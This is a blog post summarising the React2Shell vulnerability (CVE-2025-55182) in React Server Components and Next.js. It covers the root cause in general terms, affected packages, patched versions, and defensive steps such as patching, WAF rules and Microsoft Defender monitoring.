Sign in Subscribe

CVE-2025-55182 “React2Shell” Threat and Mitigations

Sascha Corti

2 min read
CVE-2025-55182 “React2Shell” Threat and Mitigations
Photo by Zulfugar Karimov / Unsplash

CVE-2025-55182, nicknamed React2Shell, is a critical security vulnerability (CVSS 10.0) affecting React Server Components (RSC) and related frameworks like Next.js. It stems from an unsafe deserialization flaw in the RSC Flight protocol, which handles server payloads. When a server receives a specially crafted request, the payload is deserialized without proper validation, allowing arbitrary attacker-controlled data to influence execution logic. The detailed description can be found here: Microsoft

Because of this flaw:

  • An attacker can trigger unauthenticated remote code execution (RCE) with a single malicious HTTP request— no credentials required.
  • The vulnerability exists in default configurations of affected packages and frameworks. (wiz.io)
  • Exploitation has been observed in the wild, including delivery of cryptominers (e.g., XMRig), remote access trojans (RATs), and lateral movement.
  • Both Windows and Linux environments can be impacted depending on deployment context.

This makes React2Shell a high-impact issue for modern web apps that rely on RSC paradigms for server-side rendering and data flow.

🛠 Technical Root Cause

React2Shell arises because certain versions of RSC packages:

  1. Trust client-provided serialized payloads
  2. Fail to properly validate deserialized objects
  3. Allow attacker data to influence internal server execution paths

This combination results in prototype pollution and execution of untrusted code on the server process (Node.js), which can lead to full server compromise.

Affected components typically include:

  • react-server-dom-webpack
  • react-server-dom-parcel
  • react-server-dom-turbopack
  • Next.js server code paths that depend on those RSC pieces (NVD)

🛡 Mitigation and Defense Strategy

Microsoft’s guidance emphasizes layered mitigation with an emphasis on immediate patching and protective controls:

1. Immediate Patching

Ensure all React and Next.js dependencies are upgraded out of the vulnerable versions:

React (Server Components) patched versions:

  • 19.0.1
  • 19.1.2
  • 19.2.1
    (or later within the same release line)

Next.js patched versions:

  • 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7
  • 16.0.7
    (or later in the same line)

Action Steps:

  • Update dependencies in your package.json and rebuild.
  • Confirm that frameworks and tooling actually pulled in corrected RSC packages.

2. Prioritize Exposed Services

Focus rollout on internet-facing services first because those are most directly at risk from unauthenticated RCE. Use vulnerability management tooling (e.g., Microsoft Defender Vulnerability Management) to enumerate and prioritize fixes across large estates.

3. Web Application Firewalls (WAF)

As a compensating control during patch rollout:

  • Deploy Azure Web Application Firewall (WAF) custom rules designed to block known exploit patterns.
  • Microsoft has published JSON rule guidance for Azure WAF that helps block likely exploit payloads while patching is in progress.

4. Monitoring and Detection

Use telemetry and alerting to identify attempted or successful exploitation:

  • Enable Microsoft Defender XDR, Defender for Endpoint, and Defender for Cloud alerts related to RSC exploitation activity.
  • Monitor logs for suspicious Node.js process behavior, unusual network traffic, or unexpected commands originating from RSC server processes.

Summary of Defender’s Recommendations

A robust defense against React2Shell should include:

  • Rapid dependency patching.
  • Exposed attack surface prioritization.
  • Layered defensive controls (WAF + monitoring).
  • Vulnerability management and continuous detection workflows.

With these measures, the attack surface is significantly reduced and malicious exploitation can be detected and blocked before it leads to full compromise.